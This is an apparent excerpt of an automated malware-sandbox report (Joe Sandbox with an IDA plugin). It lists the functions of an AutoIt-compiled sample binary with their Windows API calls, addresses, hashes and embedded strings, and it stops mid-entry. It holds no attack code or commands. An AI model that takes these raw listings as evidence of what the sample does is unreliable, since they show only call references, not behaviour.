                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: 7c09ae2b3f4e8997c6aa39e5db3f9ac2cf3c6266daa101dcbbbf832b2e86fdf6
                                                                                                                      • Instruction ID: 4b4e8f42174bf686895e32cd0515fd2eefe12f2593a8dd55940233c750c97681
                                                                                                                      • Opcode Fuzzy Hash: 7c09ae2b3f4e8997c6aa39e5db3f9ac2cf3c6266daa101dcbbbf832b2e86fdf6
                                                                                                                      • Instruction Fuzzy Hash: FC218635700214AFDB11AFB9CC88DBE77ECEF093607418225F915DB2A0DA70EC818764
                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 003DE9CD
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003DE9EA
                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003DEA22
                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003DEA48
                                                                                                                      • _wcsstr.LIBCMT ref: 003DEA52
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3902887630-2594219639
                                                                                                                      • Opcode ID: 88465ded1e9d5b9e953c1b4c0d0b281306699962cff3eba0a6229f78bac0565f
                                                                                                                      • Instruction ID: b40146d2a08bcbbe9b07d2c54fbb71f32abd36a2fcab0269546f5cd71e49ee5c
                                                                                                                      • Opcode Fuzzy Hash: 88465ded1e9d5b9e953c1b4c0d0b281306699962cff3eba0a6229f78bac0565f
                                                                                                                      • Instruction Fuzzy Hash: 8B210772604240BAEB27AB69AC45E7BBFADDF45750F11803AF809CE191DA74DC4193A0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003DCA86
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003DCAB8
                                                                                                                      • __itow.LIBCMT ref: 003DCAD0
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003DCAF6
                                                                                                                      • __itow.LIBCMT ref: 003DCB07
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$__itow$_memmove
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 2983881199-2594219639
                                                                                                                      • Opcode ID: fde6de62cb2dadf75172265e76200053e5ccb0f0bd7de55a4bb29f328b42fe9d
                                                                                                                      • Instruction ID: a084a9b78757732350d9e64a5c8e7349134f4719264fca5b1e730f48384b315e
                                                                                                                      • Opcode Fuzzy Hash: fde6de62cb2dadf75172265e76200053e5ccb0f0bd7de55a4bb29f328b42fe9d
                                                                                                                      • Instruction Fuzzy Hash: 1521D733B202047BDB22EAA4AC46FDE7A6DEF49750F102027F905EB281D6A0CD05C3A1
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003BC657
                                                                                                                        • Part of subcall function 003BC619: GetStockObject.GDI32(00000011), ref: 003BC66B
                                                                                                                        • Part of subcall function 003BC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 003BC675
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0040A13B
                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0040A148
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0040A153
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0040A162
                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0040A16E
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                      • Opcode ID: 8041676cd21f986700c169ebb1d06728e126e688caa0ed45ff064b897e69c012
                                                                                                                      • Instruction ID: 6b9b33769ec2266b380329a4c00b76dae2ae4915cf8b145f96acedc9175bbd3c
                                                                                                                      • Opcode Fuzzy Hash: 8041676cd21f986700c169ebb1d06728e126e688caa0ed45ff064b897e69c012
                                                                                                                      • Instruction Fuzzy Hash: 4211C4B155021DBEEF115F61CC86EE77F5DEF08798F014225FA08A6090C6769C21DBA4
                                                                                                                      APIs
                                                                                                                      • __getptd_noexit.LIBCMT ref: 003C4C3E
                                                                                                                        • Part of subcall function 003C86B5: GetLastError.KERNEL32(?,003C0127,003C88A3,003C4673,?,?,003C0127,?,003A125D,00000058,?,?), ref: 003C86B7
                                                                                                                        • Part of subcall function 003C86B5: __calloc_crt.LIBCMT ref: 003C86D8
                                                                                                                        • Part of subcall function 003C86B5: GetCurrentThreadId.KERNEL32 ref: 003C8701
                                                                                                                        • Part of subcall function 003C86B5: SetLastError.KERNEL32(00000000,003C0127,003C88A3,003C4673,?,?,003C0127,?,003A125D,00000058,?,?), ref: 003C8719
                                                                                                                      • CloseHandle.KERNEL32(?,?,003C4C1D), ref: 003C4C52
                                                                                                                      • __freeptd.LIBCMT ref: 003C4C59
                                                                                                                      • RtlExitUserThread.NTDLL(00000000,?,003C4C1D), ref: 003C4C61
                                                                                                                      • GetLastError.KERNEL32(?,?,003C4C1D), ref: 003C4C91
                                                                                                                      • RtlExitUserThread.NTDLL(00000000,?,?,003C4C1D), ref: 003C4C98
                                                                                                                      • __freefls@4.LIBCMT ref: 003C4CB4
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1445074172-0
                                                                                                                      • Opcode ID: c6c9d8b97f512746ec1dde71a1be132abc8a66f7f7852ae190e43d1a75dfa02b
                                                                                                                      • Instruction ID: 7539473092b1743154a36bd6b6e86f4cf253a44753f24e49329208926374218b
                                                                                                                      • Opcode Fuzzy Hash: c6c9d8b97f512746ec1dde71a1be132abc8a66f7f7852ae190e43d1a75dfa02b
                                                                                                                      • Instruction Fuzzy Hash: BA01BC74901701AFC72ABBA4D919F097BA5AF05314B11852CF908CF262EF34EE428B91
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0040E14D
                                                                                                                      • _memset.LIBCMT ref: 0040E15C
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00463EE0,00463F24), ref: 0040E18B
                                                                                                                      • CloseHandle.KERNEL32 ref: 0040E19D
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                      • String ID: $?F$>F
                                                                                                                      • API String ID: 3277943733-578166250
                                                                                                                      • Opcode ID: 350d947aafc13cc03e8197715426b96e1b270e1020ba2d23ee898edfb686d62b
                                                                                                                      • Instruction ID: 8f4bd8b7c425765924d75d0d03242874afdffff9f7ff41a00b6f2dd9f1c19a95
                                                                                                                      • Opcode Fuzzy Hash: 350d947aafc13cc03e8197715426b96e1b270e1020ba2d23ee898edfb686d62b
                                                                                                                      • Instruction Fuzzy Hash: DDF03AB1A40340BEE2109B65AC06F777A6CDB0A396F004431FA04D91A2E7FA8E1096BD
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?,?), ref: 003BC6C0
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003BC701
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 003BC729
                                                                                                                      • GetClientRect.USER32(?,?), ref: 003BC856
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003BC86F
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1296646539-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253778849-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                        • Part of subcall function 00403AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00402AA6,?,?), ref: 00403B0E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00402FA0
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402FE0
                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00403003
                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0040302C
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0040306F
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040307C
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4046560759-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2037614760-0
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003E2AF6
                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 003E2B68
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 003E2BC3
                                                                                                                      • _memmove.LIBCMT ref: 003E2BED
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003E2C3A
                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003E2C68
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1101466143-0
                                                                                                                      APIs
                                                                                                                      • GetMenu.USER32(?), ref: 0040833D
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00408374
                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0040839C
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 0040840B
                                                                                                                      • GetSubMenu.USER32(?,?), ref: 00408419
                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0040846A
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 650687236-0
                                                                                                                      APIs
                                                                                                                      • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 003F9409
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F9416
                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 003F943A
                                                                                                                      • _strlen.LIBCMT ref: 003F9484
                                                                                                                      • _memmove.LIBCMT ref: 003F94CA
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F94F7
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2795762555-0
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003E552E
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E5579
                                                                                                                      • IsMenu.USER32(00000000), ref: 003E5599
                                                                                                                      • CreatePopupMenu.USER32 ref: 003E55CD
                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 003E562B
                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003E565C
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3311875123-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 003BB1C1
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003BB225
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 003BB242
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003BB253
                                                                                                                      • EndPaint.USER32(?,?), ref: 003BB29D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1827037458-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003BB5EB
                                                                                                                        • Part of subcall function 003BB58B: SelectObject.GDI32(?,00000000), ref: 003BB5FA
                                                                                                                        • Part of subcall function 003BB58B: BeginPath.GDI32(?), ref: 003BB611
                                                                                                                        • Part of subcall function 003BB58B: SelectObject.GDI32(?,00000000), ref: 003BB63B
                                                                                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0040E9F2
                                                                                                                      • LineTo.GDI32(00000000,00000003,?), ref: 0040EA06
                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0040EA14
                                                                                                                      • LineTo.GDI32(00000000,00000000,?), ref: 0040EA24
                                                                                                                      • EndPath.GDI32(00000000), ref: 0040EA34
                                                                                                                      • StrokePath.GDI32(00000000), ref: 0040EA44
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 43455801-0
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 003DEFB6
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 003DEFC7
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003DEFCE
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 003DEFD6
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003DEFED
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 003DEFFF
                                                                                                                        • Part of subcall function 003DA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,003DA79D,00000000,00000000,?,003DAB73), ref: 003DB2CA
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 603618608-0
                                                                                                                      APIs
                                                                                                                      • __init_pointers.LIBCMT ref: 003C87D7
                                                                                                                        • Part of subcall function 003C1E5A: __initp_misc_winsig.LIBCMT ref: 003C1E7E
                                                                                                                        • Part of subcall function 003C1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003C8BE1
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003C8BF5
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003C8C08
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003C8C1B
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003C8C2E
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003C8C41
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003C8C54
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003C8C67
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003C8C7A
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003C8C8D
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003C8CA0
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003C8CB3
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003C8CC6
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003C8CD9
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003C8CEC
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003C8CFF
                                                                                                                      • __mtinitlocks.LIBCMT ref: 003C87DC
                                                                                                                        • Part of subcall function 003C8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0045AC68,00000FA0,?,?,003C87E1,003C6AFA,004567D8,00000014), ref: 003C8AD1
                                                                                                                      • __mtterm.LIBCMT ref: 003C87E5
                                                                                                                        • Part of subcall function 003C884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 003C89CF
                                                                                                                        • Part of subcall function 003C884D: _free.LIBCMT ref: 003C89D6
                                                                                                                        • Part of subcall function 003C884D: RtlDeleteCriticalSection.NTDLL(0045AC68), ref: 003C89F8
                                                                                                                      • __calloc_crt.LIBCMT ref: 003C880A
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003C8833
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2942034483-0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1423608774-0
                                                                                                                      APIs
                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003A1898
                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 003A18A0
                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003A18AB
                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003A18B6
                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 003A18BE
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003A18C6
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278518827-0
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003E8504
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003E851A
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 003E8529
                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003E8538
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003E8542
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003E8549
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 839392675-0
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 003EA330
                                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 003EA341
                                                                                                                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,004166D3,?,?,?,?,?,003AE681), ref: 003EA34E
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,004166D3,?,?,?,?,?,003AE681), ref: 003EA35B
                                                                                                                        • Part of subcall function 003E9CCE: CloseHandle.KERNEL32(?,?,003EA368,?,?,?,004166D3,?,?,?,?,?,003AE681), ref: 003E9CD8
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 003EA36E
                                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 003EA375
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3495660284-0
                                                                                                                      APIs
                                                                                                                      • _memmove.LIBCMT ref: 003AC419
                                                                                                                      • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,003E6653,?,?,00000000), ref: 003AC495
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead_memmove
                                                                                                                      • String ID: Sf>
                                                                                                                      • API String ID: 1325644223-1669175409
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C010A: std::exception::exception.LIBCMT ref: 003C013E
                                                                                                                        • Part of subcall function 003C010A: __CxxThrowException@8.LIBCMT ref: 003C0153
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                        • Part of subcall function 003ABBD9: _memmove.LIBCMT ref: 003ABC33
                                                                                                                      • __swprintf.LIBCMT ref: 003BD98F
                                                                                                                      Strings
                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 003BD832
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                      • API String ID: 1943609520-557222456
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003FB4A8
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 003FB5B7
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003FB73A
                                                                                                                        • Part of subcall function 003EA6F6: VariantInit.OLEAUT32(00000000), ref: 003EA736
                                                                                                                        • Part of subcall function 003EA6F6: VariantCopy.OLEAUT32(?,?), ref: 003EA73F
                                                                                                                        • Part of subcall function 003EA6F6: VariantClear.OLEAUT32(?), ref: 003EA74B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040C354
                                                                                                                      • ScreenToClient.USER32(?,00000002), ref: 0040C384
                                                                                                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0040C3EA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3880355969-2594219639
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003DD258
                                                                                                                      • __itow.LIBCMT ref: 003DD292
                                                                                                                        • Part of subcall function 003DD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003DD549
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 003DD2FB
                                                                                                                      • __itow.LIBCMT ref: 003DD350
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Similarity
